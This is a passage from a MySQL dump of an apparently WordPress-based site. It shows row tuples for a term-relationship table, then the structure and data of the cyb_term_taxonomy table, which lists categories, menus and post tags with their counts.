(3758, 1, 0),
(3759, 1, 0),
(3760, 1, 0),
(3761, 1, 0),
(3762, 1, 0),
(3763, 1, 0),
(3764, 1, 0),
(3765, 1, 0),
(3766, 1, 0),
(3767, 1, 0),
(3768, 1, 0),
(3769, 1, 0),
(3770, 1, 0),
(3771, 1, 0),
(3772, 1, 0),
(3773, 1, 0),
(3774, 1, 0),
(3775, 1, 0),
(3776, 1, 0),
(3777, 1, 0),
(3778, 1, 0),
(3779, 1, 0),
(3780, 1, 0),
(3781, 1, 0),
(3782, 1, 0),
(3783, 1, 0),
(3784, 1, 0),
(3785, 1, 0),
(3786, 1, 0),
(3787, 1, 0),
(3788, 1, 0),
(3789, 1, 0),
(3790, 1, 0),
(3791, 1, 0),
(3792, 1, 0),
(3793, 1, 0),
(3794, 1, 0),
(3795, 1, 0),
(3796, 1, 0),
(3797, 1, 0),
(3798, 1, 0),
(3799, 1, 0),
(3800, 1, 0),
(3802, 1, 0),
(3803, 1, 0),
(3804, 1, 0),
(3805, 1, 0),
(3806, 1, 0),
(3807, 1, 0),
(3808, 1, 0),
(3809, 1, 0),
(3810, 1, 0),
(3811, 1, 0),
(3812, 1, 0),
(3813, 1, 0),
(3814, 1, 0),
(3815, 1, 0),
(3816, 1, 0),
(3817, 1, 0),
(3818, 1, 0),
(3819, 1, 0),
(3820, 1, 0),
(3821, 1, 0),
(3822, 1, 0),
(3823, 1, 0),
(3824, 1, 0),
(3825, 1, 0),
(3826, 1, 0),
(3827, 1, 0),
(3828, 1, 0),
(3830, 1, 0),
(3831, 1, 0),
(3832, 1, 0),
(3833, 1, 0),
(3834, 1, 0),
(3835, 1, 0),
(3836, 1, 0),
(3837, 1, 0),
(3838, 1, 0),
(3839, 1, 0),
(3840, 1, 0),
(3841, 1, 0),
(3842, 1, 0),
(3843, 1, 0),
(3844, 1, 0),
(3845, 1, 0),
(3848, 1, 0),
(3849, 1, 0),
(3850, 1, 0),
(3852, 1, 0),
(3853, 1, 0),
(3854, 1, 0),
(3856, 1, 0),
(3857, 1, 0),
(3858, 1, 0),
(3859, 1, 0),
(3860, 1, 0),
(3861, 1, 0),
(3862, 1, 0),
(3863, 1, 0),
(3864, 1, 0),
(3865, 1, 0),
(3868, 1, 0),
(3869, 1, 0),
(3870, 1, 0),
(3871, 1, 0),
(3872, 1, 0),
(3873, 1, 0),
(3874, 1, 0),
(3875, 1, 0),
(3876, 1, 0),
(3877, 1, 0),
(3878, 1, 0),
(3879, 1, 0),
(3880, 1, 0),
(3881, 1, 0),
(3882, 1, 0),
(3883, 1, 0),
(3884, 1, 0),
(3885, 1, 0),
(3886, 1, 0),
(3887, 1, 0),
(3888, 1, 0),
(3889, 1, 0),
(3890, 1, 0),
(3891, 1, 0),
(3892, 1, 0),
(3893, 1, 0),
(3894, 1, 0),
(3895, 1, 0),
(3896, 1, 0),
(3897, 1, 0),
(3898, 1, 0),
(3899, 1, 0),
(3900, 1, 0),
(3901, 1, 0),
(3902, 1, 0),
(3903, 1, 0),
(3904, 1, 0),
(3905, 1, 0),
(3907, 1, 0),
(3908, 1, 0),
(3909, 1, 0),
(3910, 1, 0),
(3911, 1, 0),
(3912, 1, 0),
(3913, 1, 0),
(3914, 1, 0),
(3915, 1, 0),
(3916, 1, 0),
(3917, 1, 0),
(3918, 1, 0),
(3919, 1, 0),
(3920, 1, 0),
(3921, 1, 0),
(3922, 1, 0),
(3923, 1, 0),
(3924, 1, 0),
(3925, 1, 0),
(3926, 1, 0),
(3927, 1, 0),
(3928, 1, 0),
(3929, 1, 0),
(3930, 1, 0),
(3931, 1, 0),
(3933, 1, 0),
(3934, 1, 0),
(3935, 1, 0),
(3936, 1, 0),
(3937, 1, 0),
(3938, 1, 0),
(3939, 1, 0),
(3940, 1, 0),
(3941, 1, 0),
(3942, 1, 0),
(3943, 1, 0),
(3944, 1, 0),
(3945, 1, 0),
(3946, 1, 0),
(3947, 1, 0),
(3948, 1, 0),
(3949, 1, 0),
(3950, 1, 0),
(3951, 1, 0),
(3952, 1, 0),
(3953, 1, 0),
(3954, 1, 0),
(3958, 1, 0),
(3959, 1, 0),
(3960, 1, 0),
(3961, 1, 0),
(3962, 1, 0),
(3963, 1, 0),
(3964, 1, 0),
(3965, 1, 0),
(3966, 1, 0),
(3967, 1, 0),
(3968, 1, 0),
(3969, 1, 0),
(3970, 1, 0),
(3971, 1, 0),
(3972, 1, 0),
(3973, 1, 0),
(3974, 1, 0),
(3975, 1, 0),
(3976, 1, 0),
(3977, 1, 0),
(3978, 1, 0),
(3979, 1, 0),
(3980, 1, 0),
(3981, 1, 0),
(3982, 1, 0),
(3983, 1, 0),
(3984, 1, 0),
(3985, 1, 0),
(3986, 1, 0),
(3988, 1, 0),
(3989, 1, 0),
(3990, 1, 0),
(3991, 1, 0),
(3992, 1, 0),
(3993, 1, 0),
(3994, 1, 0),
(3995, 1, 0),
(3996, 1, 0),
(3997, 1, 0),
(3998, 1, 0),
(3999, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_term_taxonomy`
--

CREATE TABLE IF NOT EXISTS `cyb_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=652 ;

--
-- Dumping data for table `cyb_term_taxonomy`
--

INSERT INTO `cyb_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1243),
(2, 2, 'products_categories', '', 0, 5),
(3, 3, 'nav_menu', '', 0, 8),
(5, 5, 'post_format', '', 0, 0),
(7, 7, 'nav_menu', '', 0, 1),
(8, 8, 'category', '', 0, 2),
(9, 9, 'category', '', 0, 1),
(10, 10, 'category', '', 0, 1),
(11, 11, 'category', '', 0, 1),
(12, 12, 'post_tag', '', 0, 0),
(13, 13, 'post_tag', '', 0, 0),
(14, 14, 'post_tag', '', 0, 0),
(15, 15, 'post_tag', '', 0, 0),
(16, 16, 'post_tag', '', 0, 0),
(17, 17, 'post_tag', '', 0, 0),
(18, 18, 'post_tag', '', 0, 0),
(19, 19, 'post_tag', '', 0, 0),
(20, 20, 'post_tag', '', 0, 0),
(21, 21, 'post_tag', '', 0, 0),
(22, 22, 'post_tag', '', 0, 0),
(23, 23, 'post_tag', '', 0, 0),
(24, 24, 'post_tag', '', 0, 0),
(25, 25, 'post_tag', '', 0, 1),
(26, 26, 'post_tag', '', 0, 0),
(27, 27, 'post_tag', '', 0, 0),
(28, 28, 'post_tag', '', 0, 0),
(29, 29, 'post_tag', '', 0, 0),
(30, 30, 'post_tag', '', 0, 0),
(31, 31, 'post_tag', '', 0, 0),
(32, 32, 'post_tag', '', 0, 1),
(33, 33, 'post_tag', '', 0, 1),
(34, 34, 'post_tag', '', 0, 1),
(35, 35, 'post_tag', '', 0, 2),
(36, 36, 'post_tag', '', 0, 4),
(37, 37, 'post_tag', '', 0, 1),
(38, 38, 'post_tag', '', 0, 18),
(39, 39, 'post_tag', '', 0, 2),
(40, 40, 'post_tag', '', 0, 1),
(41, 41, 'post_tag', '', 0, 1),
(42, 42, 'post_tag', '', 0, 2),
(43, 43, 'post_tag', '', 0, 1),
(44, 44, 'post_tag', '', 0, 1),
(45, 45, 'post_tag', '', 0, 3),
(46, 46, 'post_tag', '', 0, 10),
(47, 47, 'post_tag', '', 0, 5),
(48, 48, 'post_tag', '', 0, 1),
(49, 49, 'post_tag', '', 0, 9),
(50, 50, 'post_tag', '', 0, 13),
(51, 51, 'post_tag', '', 0, 6),
(52, 52, 'post_tag', '', 0, 5),
(53, 53, 'post_tag', '', 0, 1),
(54, 54, 'post_tag', '', 0, 1),
(55, 55, 'post_tag', '', 0, 1),
(56, 56, 'post_tag', '', 0, 1),
(57, 57, 'post_tag', '', 0, 1),
(58, 58, 'post_tag', '', 0, 1),
(59, 59, 'post_tag', '', 0, 1),
(60, 60, 'post_tag', '', 0, 1),
(61, 61, 'post_tag', '', 0, 1),
(62, 62, 'post_tag', '', 0, 2),
(63, 63, 'post_tag', '', 0, 2),
(64, 64, 'post_tag', '', 0, 2),
(65, 65, 'post_tag', '', 0, 1),
(66, 66, 'post_tag', '', 0, 1),
(67, 67, 'post_tag', '', 0, 1),
(68, 68, 'post_tag', '', 0, 1),
(69, 69, 'post_tag', '', 0, 1),
(70, 70, 'post_tag', '', 0, 2),
(71, 71, 'post_tag', '', 0, 1),
(72, 72, 'post_tag', '', 0, 1),
(73, 73, 'post_tag', '', 0, 1),
(74, 74, 'post_tag', '', 0, 1),
(75, 75, 'post_tag', '', 0, 1),
(76, 76, 'post_tag', '', 0, 1),
(77, 77, 'post_tag', '', 0, 1),
(78, 78, 'post_tag', '', 0, 1),
(79, 79, 'post_tag', '', 0, 1),
(80, 80, 'post_tag', '', 0, 5),
(81, 81, 'post_tag', '', 0, 2),
(82, 82, 'post_tag', '', 0, 2),
(83, 83, 'post_tag', '', 0, 2),
(84, 84, 'post_tag', '', 0, 3),
(85, 85, 'post_tag', '', 0, 1),
(86, 86, 'post_tag', '', 0, 1),
(87, 87, 'post_tag', '', 0, 1),
(88, 88, 'post_tag', '', 0, 1),
(89, 89, 'post_tag', '', 0, 1),
(90, 90, 'post_tag', '', 0, 1),
(91, 91, 'post_tag', '', 0, 1),
(92, 92, 'post_tag', '', 0, 2),
(93, 93, 'post_tag', '', 0, 2),
(94, 94, 'post_tag', '', 0, 1),
(95, 95, 'post_tag', '', 0, 3),
(96, 96, 'post_tag', '', 0, 2),
(97, 97, 'post_tag', '', 0, 1),
(98, 98, 'post_tag', '', 0, 1),
(99, 99, 'post_tag', '', 0, 2),
(100, 100, 'post_tag', '', 0, 3),
(101, 101, 'post_tag', '', 0, 1),
(102, 102, 'post_tag', '', 0, 2),
(103, 103, 'post_tag', '', 0, 1),
(104, 104, 'post_tag', '', 0, 2),
(105, 105, 'post_tag', '', 0, 5),
(106, 106, 'post_tag', '', 0, 2),
(107, 107, 'post_tag', '', 0, 4),
(108, 108, 'post_tag', '', 0, 1),
(109, 109, 'post_tag', '', 0, 1),
(110, 110, 'post_tag', '', 0, 3),
(111, 111, 'post_tag', '', 0, 3),
(112, 112, 'post_tag', '', 0, 1),
(113, 113, 'post_tag', '', 0, 1),
(114, 114, 'post_tag', '', 0, 1),
(115, 115, 'post_tag', '', 0, 1),
(116, 116, 'post_tag', '', 0, 2),
(117, 117, 'post_tag', '', 0, 1),
(118, 118, 'post_tag', '', 0, 1),
(119, 119, 'post_tag', '', 0, 1),
(120, 120, 'post_tag', '', 0, 1),
(121, 121, 'post_tag', '', 0, 1),
(122, 122, 'post_tag', '', 0, 1),
(123, 123, 'post_tag', '', 0, 1),
(124, 124, 'post_tag', '', 0, 1),
(125, 125, 'post_tag', '', 0, 2),
(126, 126, 'post_tag', '', 0, 1),
(127, 127, 'post_tag', '', 0, 1),
(128, 128, 'post_tag', '', 0, 1),
(129, 129, 'post_tag', '', 0, 1),
(130, 130, 'post_tag', '', 0, 1),
(131, 131, 'post_tag', '', 0, 1),
(132, 132, 'post_tag', '', 0, 1),
(133, 133, 'post_tag', '', 0, 1),
(134, 134, 'post_tag', '', 0, 1),
(135, 135, 'post_tag', '', 0, 1),
(136, 136, 'post_tag', '', 0, 1),
(137, 137, 'post_tag', '', 0, 1),
(138, 138, 'post_tag', '', 0, 1),
(139, 139, 'post_tag', '', 0, 1),
(140, 140, 'post_tag', '', 0, 1),
(141, 141, 'post_tag', '', 0, 1),
(142, 142, 'post_tag', '', 0, 1),
(143, 143, 'post_tag', '', 0, 1),
(144, 144, 'post_tag', '', 0, 1),
(145, 145, 'post_tag', '', 0, 1),
(146, 146, 'post_tag', '', 0, 1),
(147, 147, 'post_tag', '', 0, 1),
(148, 148, 'post_tag', '', 0, 1),
(149, 149, 'post_tag', '', 0, 1),
(150, 150, 'post_tag', '', 0, 1),
(151, 151, 'post_tag', '', 0, 1),
(152, 152, 'post_tag', '', 0, 1),
(153, 153, 'post_tag', '', 0, 1),
(154, 154, 'post_tag', '', 0, 1),
(155, 155, 'post_tag', '', 0, 1),
(156, 156, 'post_tag', '', 0, 1),
(157, 157, 'post_tag', '', 0, 1),
(158, 158, 'post_tag', '', 0, 1),
(159, 159, 'post_tag', '', 0, 1),
(160, 160, 'post_tag', '', 0, 1),
(161, 161, 'post_tag', '', 0, 1),
(162, 162, 'post_tag', '', 0, 1),
(163, 163, 'post_tag', '', 0, 1),
(164, 164, 'post_tag', '', 0, 1),
(165, 165, 'post_tag', '', 0, 1),
(166, 166, 'post_tag', '', 0, 1),
(167, 167, 'post_tag', '', 0, 1),
(168, 168, 'post_tag', '', 0, 1),
(169, 169, 'post_tag', '', 0, 1),
(170, 170, 'post_tag', '', 0, 1),
(171, 171, 'post_tag', '', 0, 1),
(172, 172, 'post_tag', '', 0, 1),
(173, 173, 'post_tag', '', 0, 1),
(174, 174, 'post_tag', '', 0, 1),
(175, 175, 'post_tag', '', 0, 1),
(176, 176, 'post_tag', '', 0, 1),
(177, 177, 'post_tag', '', 0, 1),
(178, 178, 'post_tag', '', 0, 1),
(179, 179, 'post_tag', '', 0, 1),
(180, 180, 'post_tag', '', 0, 1),
(181, 181, 'post_tag', '', 0, 1),
(182, 182, 'post_tag', '', 0, 1),
(183, 183, 'post_tag', '', 0, 1),
(184, 184, 'post_tag', '', 0, 2),
(185, 185, 'post_tag', '', 0, 4),
(186, 186, 'post_tag', '', 0, 1),
(187, 187, 'post_tag', '', 0, 3),
(188, 188, 'post_tag', '', 0, 2),
(189, 189, 'post_tag', '', 0, 3),
(190, 190, 'post_tag', '', 0, 2),
(191, 191, 'post_tag', '', 0, 3),
(192, 192, 'post_tag', '', 0, 3),
(193, 193, 'post_tag', '', 0, 3),
(194, 194, 'post_tag', '', 0, 2),
(195, 195, 'post_tag', '', 0, 3),
(196, 196, 'post_tag', '', 0, 3),
(197, 197, 'post_tag', '', 0, 3),
(198, 198, 'post_tag', '', 0, 3),
(199, 199, 'post_tag', '', 0, 3),
(200, 200, 'post_tag', '', 0, 3),
(201, 201, 'post_tag', '', 0, 2),
(202, 202, 'post_tag', '', 0, 2),
(203, 203, 'post_tag', '', 0, 2),
(204, 204, 'post_tag', '', 0, 2),
(205, 205, 'post_tag', '', 0, 3),
(206, 206, 'post_tag', '', 0, 2),
(207, 207, 'post_tag', '', 0, 3),
(208, 208, 'post_tag', '', 0, 1),
(209, 209, 'post_tag', '', 0, 3),
(210, 210, 'post_tag', '', 0, 2),
(211, 211, 'post_tag', '', 0, 3),
(212, 212, 'post_tag', '', 0, 2),
(213, 213, 'post_tag', '', 0, 5),
(214, 214, 'post_tag', '', 0, 2),
(215, 215, 'post_tag', '', 0, 3),
(216, 216, 'post_tag', '', 0, 2),
(217, 217, 'post_tag', '', 0, 3),
(218, 218, 'post_tag', '', 0, 3),
(219, 219, 'post_tag', '', 0, 2),
(220, 220, 'post_tag', '', 0, 1),
(221, 221, 'post_tag', '', 0, 1),
(222, 222, 'post_tag', '', 0, 2),
(223, 223, 'post_tag', '', 0, 1),
(224, 224, 'post_tag', '', 0, 1),
(225, 225, 'post_tag', '', 0, 2),
(226, 226, 'post_tag', '', 0, 1),
(227, 227, 'post_tag', '', 0, 1),
(228, 228, 'post_tag', '', 0, 1),
(229, 229, 'post_tag', '', 0, 2),
(230, 230, 'post_tag', '', 0, 1),
(231, 231, 'post_tag', '', 0, 1),
(232, 232, 'post_tag', '', 0, 1),
(233, 233, 'post_tag', '', 0, 1),
(234, 234, 'post_tag', '', 0, 1),
(235, 235, 'post_tag', '', 0, 1),
(236, 236, 'post_tag', '', 0, 1),
(237, 237, 'post_tag', '', 0, 1),
(238, 238, 'post_tag', '', 0, 1),
(239, 239, 'post_tag', '', 0, 1),
(240, 240, 'post_tag', '', 0, 1),
(241, 241, 'post_tag', '', 0, 1),
(242, 242, 'post_tag', '', 0, 1),
(243, 243, 'post_tag', '', 0, 1),
(244, 244, 'post_tag', '', 0, 1),
(245, 245, 'post_tag', '', 0, 1),
(246, 246, 'post_tag', '', 0, 1),
(247, 247, 'post_tag', '', 0, 1),
(248, 248, 'post_tag', '', 0, 1),
(249, 249, 'post_tag', '', 0, 1),
(250, 250, 'post_tag', '', 0, 1),
(251, 251, 'post_tag', '', 0, 1),
(252, 252, 'post_tag', '', 0, 1),
(253, 253, 'post_tag', '', 0, 1),
(254, 254, 'post_tag', '', 0, 1),
(255, 255, 'post_tag', '', 0, 1),
(256, 256, 'post_tag', '', 0, 1),
(257, 257, 'post_tag', '', 0, 1),
(258, 258, 'post_tag', '', 0, 1),
(259, 259, 'post_tag', '', 0, 1),
(260, 260, 'post_tag', '', 0, 1),
(261, 261, 'post_tag', '', 0, 1),
(262, 262, 'post_tag', '', 0, 1),
(263, 263, 'post_tag', '', 0, 1),
(264, 264, 'post_tag', '', 0, 1),
(265, 265, 'post_tag', '', 0, 1),
(266, 266, 'post_tag', '', 0, 2),
(267, 267, 'post_tag', '', 0, 1),
(268, 268, 'post_tag', '', 0, 2),
(269, 269, 'post_tag', '', 0, 1),
(270, 270, 'post_tag', '', 0, 2),
(271, 271, 'post_tag', '', 0, 1),
(272, 272, 'post_tag', '', 0, 2),
(273, 273, 'post_tag', '', 0, 2),
(274, 274, 'post_tag', '', 0, 2),
(275, 275, 'post_tag', '', 0, 2),
(276, 276, 'post_tag', '', 0, 2),
(277, 277, 'post_tag', '', 0, 1),
(278, 278, 'post_tag', '', 0, 2),
(279, 279, 'post_tag', '', 0, 1),
(280, 280, 'post_tag', '', 0, 2),
(281, 281, 'post_tag', '', 0, 2),
(282, 282, 'post_tag', '', 0, 1),
(283, 283, 'post_tag', '', 0, 1),
(284, 284, 'post_tag', '', 0, 1),
(285, 285, 'post_tag', '', 0, 1),
(286, 286, 'post_tag', '', 0, 1),
(287, 287, 'post_tag', '', 0, 1),
(288, 288, 'post_tag', '', 0, 1),
(289, 289, 'post_tag', '', 0, 1),
(290, 290, 'post_tag', '', 0, 1),
(291, 291, 'post_tag', '', 0, 1),
(292, 292, 'post_tag', '', 0, 2),
(293, 293, 'post_tag', '', 0, 1),
(294, 294, 'post_tag', '', 0, 2),
(295, 295, 'post_tag', '', 0, 1),
(296, 296, 'post_tag', '', 0, 1),
(297, 297, 'post_tag', '', 0, 2),
(298, 298, 'post_tag', '', 0, 2),
(299, 299, 'post_tag', '', 0, 1),
(300, 300, 'post_tag', '', 0, 2),
(301, 301, 'post_tag', '', 0, 2),
(302, 302, 'post_tag', '', 0, 1),
(303, 303, 'post_tag', '', 0, 1),
(304, 304, 'post_tag', '', 0, 2),
(305, 305, 'post_tag', '', 0, 1),
(306, 306, 'post_tag', '', 0, 1),
(307, 307, 'post_tag', '', 0, 2),
(308, 308, 'post_tag', '', 0, 1),
(309, 309, 'post_tag', '', 0, 1),
(310, 310, 'post_tag', '', 0, 1),
(311, 311, 'post_tag', '', 0, 1),
(312, 312, 'post_tag', '', 0, 1),
(313, 313, 'post_tag', '', 0, 1),
(314, 314, 'post_tag', '', 0, 1),
(315, 315, 'post_tag', '', 0, 1),
(316, 316, 'post_tag', '', 0, 1),
(317, 317, 'post_tag', '', 0, 1),
(318, 318, 'post_tag', '', 0, 2),
(319, 319, 'post_tag', '', 0, 1),
(320, 320, 'post_tag', '', 0, 2),
(321, 321, 'post_tag', '', 0, 2),
(322, 322, 'post_tag', '', 0, 1),
(323, 323, 'post_tag', '', 0, 1),
(324, 324, 'post_tag', '', 0, 1),
(325, 325, 'post_tag', '', 0, 1),
(326, 326, 'post_tag', '', 0, 1),
(327, 327, 'post_tag', '', 0, 1),
(328, 328, 'post_tag', '', 0, 1),
(329, 329, 'post_tag', '', 0, 1),
(330, 330, 'post_tag', '', 0, 1),
(331, 331, 'post_tag', '', 0, 1),
(332, 332, 'post_tag', '', 0, 1),
(333, 333, 'post_tag', '', 0, 1),
(334, 334, 'post_tag', '', 0, 1),
(335, 335, 'post_tag', '', 0, 1),
(336, 336, 'post_tag', '', 0, 1),
(337, 337, 'post_tag', '', 0, 1),
(338, 338, 'post_tag', '', 0, 1),
(339, 339, 'post_tag', '', 0, 1),
(340, 340, 'post_tag', '', 0, 1),
(341, 341, 'post_tag', '', 0, 1),
(342, 342, 'post_tag', '', 0, 1),
(343, 343, 'post_tag', '', 0, 2),
(344, 344, 'post_tag', '', 0, 2),
(345, 345, 'post_tag', '', 0, 1),
(346, 346, 'post_tag', '', 0, 2),
(347, 347, 'post_tag', '', 0, 2),
(348, 348, 'post_tag', '', 0, 1),
(349, 349, 'post_tag', '', 0, 1),
(350, 350, 'post_tag', '', 0, 1),
(351, 351, 'post_tag', '', 0, 2),
(352, 352, 'post_tag', '', 0, 2),
(353, 353, 'post_tag', '', 0, 2),
(354, 354, 'post_tag', '', 0, 2),
(355, 355, 'post_tag', '', 0, 1),
(356, 356, 'post_tag', '', 0, 2),
(357, 357, 'post_tag', '', 0, 1),
(358, 358, 'post_tag', '', 0, 2),
(359, 359, 'post_tag', '', 0, 1),
(360, 360, 'post_tag', '', 0, 1),
(361, 361, 'post_tag', '', 0, 1),
(362, 362, 'post_tag', '', 0, 1),
(363, 363, 'post_tag', '', 0, 1),
(364, 364, 'post_tag', '', 0, 1),
(365, 365, 'post_tag', '', 0, 1),
(366, 366, 'post_tag', '', 0, 1),
(367, 367, 'post_tag', '', 0, 1),
(368, 368, 'post_tag', '', 0, 1),
(369, 369, 'post_tag', '', 0, 1),
(370, 370, 'post_tag', '', 0, 1),
(371, 371, 'post_tag', '', 0, 1),
(372, 372, 'post_tag', '', 0, 2),
(373, 373, 'post_tag', '', 0, 1),
(374, 374, 'post_tag', '', 0, 2),
(375, 375, 'post_tag', '', 0, 2),
(376, 376, 'post_tag', '', 0, 1),
(377, 377, 'post_tag', '', 0, 1),
(378, 378, 'post_tag', '', 0, 1),
(379, 379, 'post_tag', '', 0, 1),
(380, 380, 'post_tag', '', 0, 1),
(381, 381, 'post_tag', '', 0, 1),
(382, 382, 'post_tag', '', 0, 1),
(383, 383, 'post_tag', '', 0, 2),
(384, 384, 'post_tag', '', 0, 2),
(385, 385, 'post_tag', '', 0, 2),
(386, 386, 'post_tag', '', 0, 1),
(387, 387, 'post_tag', '', 0, 1),
(388, 388, 'post_tag', '', 0, 2),
(389, 389, 'post_tag', '', 0, 1),
(390, 390, 'post_tag', '', 0, 1),
(391, 391, 'post_tag', '', 0, 1),
(392, 392, 'post_tag', '', 0, 1),
(393, 393, 'post_tag', '', 0, 1),
(394, 394, 'post_tag', '', 0, 1),
(395, 395, 'post_tag', '', 0, 1),
(396, 396, 'post_tag', '', 0, 1),
(397, 397, 'post_tag', '', 0, 1),
(398, 398, 'post_tag', '', 0, 1),
(399, 399, 'post_tag', '', 0, 1),
(400, 400, 'post_tag', '', 0, 3),
(401, 401, 'post_tag', '', 0, 1),
(402, 402, 'post_tag', '', 0, 1),
(403, 403, 'post_tag', '', 0, 1),
(404, 404, 'post_tag', '', 0, 2),
(405, 405, 'post_tag', '', 0, 2),
(406, 406, 'post_tag', '', 0, 2),
(407, 407, 'post_tag', '', 0, 2),
(408, 408, 'post_tag', '', 0, 1),
(409, 409, 'post_tag', '', 0, 2),
(410, 410, 'post_tag', '', 0, 2),
(411, 411, 'post_tag', '', 0, 2),
(412, 412, 'post_tag', '', 0, 1),
(413, 413, 'post_tag', '', 0, 2),
(414, 414, 'post_tag', '', 0, 2),
(415, 415, 'post_tag', '', 0, 2),
(416, 416, 'post_tag', '', 0, 1),
(417, 417, 'post_tag', '', 0, 1),
(418, 418, 'post_tag', '', 0, 2),
(419, 419, 'post_tag', '', 0, 2),
(420, 420, 'post_tag', '', 0, 1),
(421, 421, 'post_tag', '', 0, 1),
(422, 422, 'post_tag', '', 0, 1),
(423, 423, 'post_tag', '', 0, 2),
(424, 424, 'post_tag', '', 0, 1),
(425, 425, 'post_tag', '', 0, 1),
(426, 426, 'post_tag', '', 0, 1),
(427, 427, 'post_tag', '', 0, 1),
(428, 428, 'post_tag', '', 0, 1),
(429, 429, 'post_tag', '', 0, 1),
(430, 430, 'post_tag', '', 0, 1),
(431, 431, 'post_tag', '', 0, 1),
(432, 432, 'post_tag', '', 0, 1),
(433, 433, 'post_tag', '', 0, 1),
(434, 434, 'post_tag', '', 0, 1),
(435, 435, 'post_tag', '', 0, 1),
(436, 436, 'post_tag', '', 0, 1),
(437, 437, 'post_tag', '', 0, 1),
(438, 438, 'post_tag', '', 0, 1),
(439, 439, 'post_tag', '', 0, 1),
(440, 440, 'post_tag', '', 0, 1),
(441, 441, 'post_tag', '', 0, 1),
(442, 442, 'post_tag', '', 0, 1),
(443, 443, 'post_tag', '', 0, 1),
(444, 444, 'post_tag', '', 0, 1),
(445, 445, 'post_tag', '', 0, 1),
(446, 446, 'post_tag', '', 0, 1),
(447, 447, 'post_tag', '', 0, 1),
(448, 448, 'post_tag', '', 0, 1),
(449, 449, 'post_tag', '', 0, 1),
(450, 450, 'post_tag', '', 0, 1),
(451, 451, 'post_tag', '', 0, 1),
(452, 452, 'post_tag', '', 0, 1),
(453, 453, 'post_tag', '', 0, 1),
(454, 454, 'post_tag', '', 0, 1),
(455, 455, 'post_tag', '', 0, 2),
(456, 456, 'post_tag', '', 0, 1),
(457, 457, 'post_tag', '', 0, 1),
(458, 458, 'post_tag', '', 0, 1),
(459, 459, 'post_tag', '', 0, 1),
(460, 460, 'post_tag', '', 0, 1),
(461, 461, 'post_tag', '', 0, 2),
(462, 462, 'post_tag', '', 0, 2),
(463, 463, 'post_tag', '', 0, 1),
(464, 464, 'post_tag', '', 0, 2),
(465, 465, 'post_tag', '', 0, 2),
(466, 466, 'post_tag', '', 0, 1),
(467, 467, 'post_tag', '', 0, 1),
(468, 468, 'post_tag', '', 0, 1),
(469, 469, 'post_tag', '', 0, 2),
(470, 470, 'post_tag', '', 0, 1),
(471, 471, 'post_tag', '', 0, 1),
(472, 472, 'post_tag', '', 0, 1),
(473, 473, 'post_tag', '', 0, 1),
(474, 474, 'post_tag', '', 0, 1),
(475, 475, 'post_tag', '', 0, 1),
(476, 476, 'post_tag', '', 0, 1),
(477, 477, 'post_tag', '', 0, 1),
(478, 478, 'post_tag', '', 0, 1),
(479, 479, 'post_tag', '', 0, 1),
(480, 480, 'post_tag', '', 0, 1),
(481, 481, 'post_tag', '', 0, 1),
(482, 482, 'post_tag', '', 0, 1),
(483, 483, 'post_tag', '', 0, 1),
(484, 484, 'post_tag', '', 0, 1),
(485, 485, 'post_tag', '', 0, 1),
(486, 486, 'post_tag', '', 0, 1),
(487, 487, 'post_tag', '', 0, 1),
(488, 488, 'post_tag', '', 0, 1),
(489, 489, 'post_tag', '', 0, 1),
(490, 490, 'post_tag', '', 0, 1),
(491, 491, 'post_tag', '', 0, 1),
(492, 492, 'post_tag', '', 0, 1),
(493, 493, 'post_tag', '', 0, 1),
(494, 494, 'post_tag', '', 0, 1),
(495, 495, 'post_tag', '', 0, 1),
(496, 496, 'post_tag', '', 0, 1),
(497, 497, 'post_tag', '', 0, 1),
(498, 498, 'post_tag', '', 0, 1),
(499, 499, 'post_tag', '', 0, 1),
(500, 500, 'post_tag', '', 0, 1),
(501, 501, 'post_tag', '', 0, 1),
(502, 502, 'post_tag', '', 0, 1),
(503, 503, 'post_tag', '', 0, 1),
(504, 504, 'post_tag', '', 0, 1),
(505, 505, 'post_tag', '', 0, 1),
(506, 506, 'post_tag', '', 0, 1),
(507, 507, 'post_tag', '', 0, 1),
(508, 508, 'post_tag', '', 0, 1),
(509, 509, 'post_tag', '', 0, 1),
(510, 510, 'post_tag', '', 0, 1),
(511, 511, 'post_tag', '', 0, 1),
(512, 512, 'post_tag', '', 0, 1),
(513, 513, 'post_tag', '', 0, 1),
(514, 514, 'post_tag', '', 0, 1),
(515, 515, 'post_tag', '', 0, 1),
(516, 516, 'post_tag', '', 0, 1),
(517, 517, 'post_tag', '', 0, 1),
(518, 518, 'post_tag', '', 0, 1),
(519, 519, 'post_tag', '', 0, 1),
(520, 520, 'post_tag', '', 0, 1),
(521, 521, 'post_tag', '', 0, 1),
(522, 522, 'post_tag', '', 0, 1),
(523, 523, 'post_tag', '', 0, 1),
(524, 524, 'post_tag', '', 0, 1),
(525, 525, 'post_tag', '', 0, 1),
(526, 526, 'post_tag', '', 0, 1),
(527, 527, 'post_tag', '', 0, 1),
(528, 528, 'post_tag', '', 0, 1),
(529, 529, 'post_tag', '', 0, 1),
(530, 530, 'post_tag', '', 0, 1),
(531, 531, 'post_tag', '', 0, 1),
(532, 532, 'post_tag', '', 0, 1),
(533, 533, 'post_tag', '', 0, 1),
(534, 534, 'post_tag', '', 0, 1),
(535, 535, 'post_tag', '', 0, 1),
(536, 536, 'post_tag', '', 0, 1),
(537, 537, 'post_tag', '', 0, 1),
(538, 538, 'post_tag', '', 0, 1),
(539, 539, 'post_tag', '', 0, 3),
(540, 540, 'post_tag', '', 0, 3),
(541, 541, 'post_tag', '', 0, 1),
(542, 542, 'post_tag', '', 0, 1),
(543, 543, 'post_tag', '', 0, 1),
(544, 544, 'post_tag', '', 0, 1),
(545, 545, 'post_tag', '', 0, 1),
(546, 546, 'post_tag', '', 0, 1),
(547, 547, 'post_tag', '', 0, 1),
(548, 548, 'post_tag', '', 0, 1),
(549, 549, 'post_tag', '', 0, 1),
